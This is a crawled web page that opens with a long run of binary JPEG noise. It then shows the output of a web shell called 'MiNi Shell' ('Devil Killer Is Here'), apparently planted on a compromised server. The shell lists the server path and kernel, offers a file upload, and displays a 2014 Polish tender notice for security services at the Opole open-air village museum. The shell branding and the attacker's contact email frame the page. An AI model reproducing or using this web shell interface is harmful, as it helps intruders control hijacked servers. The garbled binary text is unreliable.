JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140327/105168-N-2014.html

<p class="kh_header"><b>Opole: Ochrona fizyczna osób i mienia Muzeum Wsi Opolskiej w Opolu</b><br>
<b>Numer ogłoszenia: 105168 - 2014; data zamieszczenia: 27.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Wsi Opolskiej w Opolu , ul. Wrocławska 174, 45-835 Opole, woj. opolskie, tel. 0-77 4572349, 4743021, faks 0-77 4572349, 4743021.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona fizyczna osób i mienia Muzeum Wsi Opolskiej w Opolu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	 Przedmiot zamówienia określa się za pomocą poniższych kodów
             Wspólnego Słownika Zamówień
2.	Główny przedmiot: CPV 7971000-4
3.	Przedmioty dodatkowe: CPV 79711000-1, 98341120-2, 98341130-5.
4.	Zamawiający nie dopuszcza składania ofert częściowych i wariantowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1, 98.34.11.20-2, 98.34.11.30-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 Ustawy dotyczące:

1.	posiadania uprawnień do wykonywania działalności lub czynności określonej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
koncesja na prowadzenie działalności gospodarczej w branży ochrony osób                 
i mienia prowadzonej minimum 5 lat - gdy okres prowadzenia działalności jest  
krótszy - za ten okres.

2.	Posiadania wiedzy i doświadczenia:
a)	Zamawiający, z uwagi na szczególną specyfikę obiektu (drewniana zabudowa, zagrożenie pożarowe), wymaga aby Wykonawca w okresie ostatnich trzech lat,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, realizował, lub realizuje usługi odpowiadające swoim rodzajem przedmiotowi niniejszego zamówienia, polegające na:
-	stałej, bezpośredniej ochronie fizycznej osób i mienia, obsłudze systemu przeciwpożarowego oraz gotowości do podjęcia działań przez grupę patrolowo-interwencyjną, co najmniej dwóch usług ochrony placówek muzealnych, które gromadzą obiekty muzealne (muzea na wolnym powietrzu) w których zgromadzone są obiekty budowlane zaliczane do kategorii zagrożenia ludzi ZL III oraz kategorii zagrożenia pożarowego terenu i zgromadzonych na nim obiektów ZL III,   
-	zabezpieczenia dwóch imprez o charakterze artystyczno-rozrywkowym              w obiektach o zbliżonej charakterystyce do obiektu Zamawiającego (na wolnym powietrzu teren ogrodzony, zabudowany) w których udział wzięło co najmniej  10 tyś. uczestników w ciągu jednego dnia,

3.	Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:
a)	Wykonawca dysponuje co najmniej dwoma grupami interwencyjnymi zlokalizowanymi na terenie miasta Opola, których czas dojazdu do obiektu Zamawiającego  od momentu zgłoszenia nie przekroczy 15 minut.         Zamawiający w przedmiotowym zakresie nie dopuszcza możliwości korzystania                        z podwykonawców.
b)	Wykonawca dysponuje stacją monitorowania alarmów.                       Zamawiający w przedmiotowym zakresie nie dopuszcza możliwości korzystania                        z podwykonawców,
c)	Wykonawca dysponuje co najmniej dwoma radiotelefonami działającymi na wydzielonym paśmie Wykonawcy. 

4.	W szczególności Wykonawca musi wykazać, że:
a)	posiada doświadczenie w wykonywaniu zamówień na ochronę fizyczną osób       i mienia w okresie ostatnich 3 lat,  w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie, w tym przynajmniej dwa o wartości nie mniejszej niż 90 000,00 zł brutto (rocznie). 
b)	Dysponuje osobami do pełnienia poniższych czynności:
-	całodobowa ochrona obiektów zabytkowych, administracyjnych, administracyjno-warsztatowych i technicznych położonych w Opolu przy           ul. Wrocławskiej 174 oraz osób zatrudnionych w Muzeum, a także osób zwiedzających Muzeum,
c)	 Pracownicy ochrony przewidziani do realizacji zamówienia muszą:
-	posiadać badania lekarskie potwierdzające ich zdolność do wykonywania czynności ochrony oraz potwierdzenia ich niekaralności,
-	wszyscy pracownicy grup interwencyjnych powinny posiadać licencję ochrony  co najmniej I stopnia,
d)    Zamawiający nie dopuszcza możliwości zatrudnienia osób o orzeczonym 
       stopniu niepełnosprawności
e)     Pracownicy ochrony przewidziani do realizacji zamówienia wyposażeni będą        
                    w środek łączności umożliwiający kontakt w razie zaistniałej konieczności   
                    (telefon komórkowy),
-	 pilot antynapadowy umożliwiający wezwanie grupy interwencyjnej,
-	 rejestrator obchodów w czasie rzeczywistym,
-	 jednolite umundurowanie,
-	 latarkę, rower oraz inny sprzęt potrzebny do realizacji zamówienia.

5.	Sytuacja ekonomiczna i finansowa Wykonawcy zapewnia wykonanie zamówienia:
-	Wykonawca posiada opłaconą polisę lub inny dokument ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 3 000 000,00 zł. Jeżeli z treści polisy, a w przypadku jej braku innego dokumentu nie wynika, że jest ona opłacona, należy również załączyć dokumenty, które będą stanowić dowód jej opłacenia.
Polisa dostarczona będzie w dniu podpisania umowy,
-	zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
-	zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłaceniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
-	listę podmiotów należących do tej samej grupy kapitałowej, o której mowa           w art.26, ust. 2d, albo informację o tym, że nie należy do grupy kapitałowej.
Na potwierdzenie spełnienia warunków technicznych Wykonawca musi złożyć        
 w ofercie:
a)	Wykaz wykonanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania podobnych usług ochrony osób i mienia obiektów położonych na terenie o powierzchni zbliżonej do przedmiotu zamówienia na wolnym powietrzu (teren otwarty ogrodzony), wraz z referencjami (minimum 2 referencje), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich przedmiotu, wartości, daty i miejsca wykonania oraz dokumentów potwierdzających, że usługa została wykonana należycie.
Zamawiający nie uzna referencji nie spełniających następujących warunków:
	referencje mają dotyczyć ochrony placówek muzealnych w których przynajmniej część eksponatów muzealnych stanowią obiekty budowlane eksponowane na wolnym powietrzu (obiekty budowlane zaliczanych do kategorii zagrożenia pożarowego terenu oraz ludzi ZL III),
b)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie        do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert, a także wskazującego osoby upoważnione do dokonywania czynności prawnych w imieniu oferenta (oryginał lub kserokopia podpisana za zgodność z oryginałem przez Wykonawcę),
c)	koncesję na prowadzenie działalności gospodarczej w branży ochrony osób          i mienia prowadzonej minimum przez 5 lat (oryginał lub kserokopia podpisana    za zgodność z oryginałem przez Wykonawcę), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
d)	referencje od organizatorów imprez o charakterze artystyczno-rozrywkowym       w obiektach o zbliżonej charakterystyce do obiektu Zamawiającego (na wolnym powietrzu, teren ogrodzony, zabudowany), w których udział wzięło co najmniej   10 tyś. osób (minimum 2 referencje),
e)	oświadczenie o dysponowaniu co najmniej dwoma grupami interwencyjnymi zlokalizowanymi na terenie miasta Opola, których czas dojazdu do obiektu Zamawiającego od momentu zgłoszenia zdarzenia nie przekroczy 15 minut
      Zamawiający po dacie otwarcia ofert zweryfikuje czas dojazdu grup
      interwencyjnych do obiektu Zamawiającego poprzez jednorazowe przykładowe
      przywołanie grup interwencyjnych Wykonawcy, dzwoniąc na numer kontaktowy
      podany w formularzu oferty.
      Zamawiający uzna za spełniony warunek w przypadku dojazdu dwóch grup 
      interwencyjnych do siedziby Zamawiającego, w określony w specyfikacji czasie,
f)	oświadczenie o dysponowaniu stacją monitorowania alarmów,
g)	pozwolenie Prezesa Urzędu Komunikacji Elektronicznej na używanie radiowych urządzeń nadawczo-odbiorczych pracujących w służbie radiokomunikacji ruchomej lądowej  typu dyspozytorskiego, obejmującej swym zasięgiem miasto Opole i okolice.

6.	W postępowaniu mogą wziąć udział Wykonawcy, którzy nie podlegają wykluczeniu             z postępowania na podstawie art. 24, ust. 1 Ustawy Prawo zamówień publicznych.  

7.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (konsorcjum, spółka cywilna):
1)	W przypadku, o którym mowa w pkt. 5  Wyko?nawcy ustanawiają pełnomocnika do reprezentowa?nia ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, bądź wszyscy podpisują umowę.
2)	Przepisy dotyczące wykonawcy stosuje się odpo?wiednio do wykonawców,            o których mowa w części VI pkt 1÷ 5 niniejszej specyfikacji.
3)	Jeżeli oferta wykonawców, o których mowa w ppkt 1, została wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wy?konawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Wykaz wykonanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania podobnych usług ochrony osób i mienia obiektów położonych na terenie o powierzchni zbliżonej do przedmiotu zamówienia na wolnym powietrzu (teren otwarty ogrodzony), wraz z referencjami (minimum 2 referencje), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich przedmiotu, wartości, daty i miejsca wykonania oraz dokumentów potwierdzających, że usługa została wykonana należycie.
Zamawiający nie uzna referencji nie spełniających następujących warunków:
-referencje mają dotyczyć ochrony placówek muzealnych w których przynajmniej część eksponatów muzealnych stanowią obiekty budowlane eksponowane na wolnym powietrzu (obiekty budowlane zaliczanych do kategorii zagrożenia pożarowego terenu oraz ludzi ZL III),
b)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie        do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert, a także wskazującego osoby upoważnione do dokonywania czynności prawnych w imieniu oferenta (oryginał lub kserokopia podpisana za zgodność z oryginałem przez Wykonawcę),
c)	koncesję na prowadzenie działalności gospodarczej w branży ochrony osób          i mienia prowadzonej minimum przez 5 lat (oryginał lub kserokopia podpisana    za zgodność z oryginałem przez Wykonawcę), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
d)	referencje od organizatorów imprez o charakterze artystyczno-rozrywkowym       w obiektach o zbliżonej charakterystyce do obiektu Zamawiającego (na wolnym powietrzu, teren ogrodzony, zabudowany), w których udział wzięło co najmniej   10 tyś. osób (minimum 2 referencje),
e)	oświadczenie o dysponowaniu co najmniej dwoma grupami interwencyjnymi zlokalizowanymi na terenie miasta Opola, których czas dojazdu do obiektu Zamawiającego od momentu zgłoszenia zdarzenia nie przekroczy 15 minut
      Zamawiający po dacie otwarcia ofert zweryfikuje czas dojazdu grup
      interwencyjnych do obiektu Zamawiającego poprzez jednorazowe przykładowe
      przywołanie grup interwencyjnych Wykonawcy, dzwoniąc na numer kontaktowy
      podany w formularzu oferty.
      Zamawiający uzna za spełniony warunek w przypadku dojazdu dwóch grup 
      interwencyjnych do siedziby Zamawiającego, w określony w specyfikacji czasie,
f)	oświadczenie o dysponowaniu stacją monitorowania alarmów,
g)	pozwolenie Prezesa Urzędu Komunikacji Elektronicznej na używanie radiowych urządzeń nadawczo-odbiorczych pracujących w służbie radiokomunikacji ruchomej lądowej  typu dyspozytorskiego, obejmującej swym zasięgiem miasto Opole i okolice.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.	Sytuacja ekonomiczna i finansowa Wykonawcy zapewnia wykonanie zamówienia:
-	Wykonawca posiada opłaconą polisę lub inny dokument ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 3 000 000,00 zł. Jeżeli z treści polisy, a w przypadku jej braku innego dokumentu nie wynika, że jest ona opłacona, należy również załączyć dokumenty, które będą stanowić dowód jej opłacenia.
Polisa dostarczona będzie w dniu podpisania umowy,
-	zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
-	zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłaceniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
-	listę podmiotów należących do tej samej grupy kapitałowej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.muzeumwsiopolskiej.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Wsi Opolskiej w Opolu
ul. Wrocławska 174
Opole.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2014 godzina 08:00, miejsce: Muzeum Wsi Opolskiej w Opolu
ul. Wrocławska 174
Opole 45-835
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com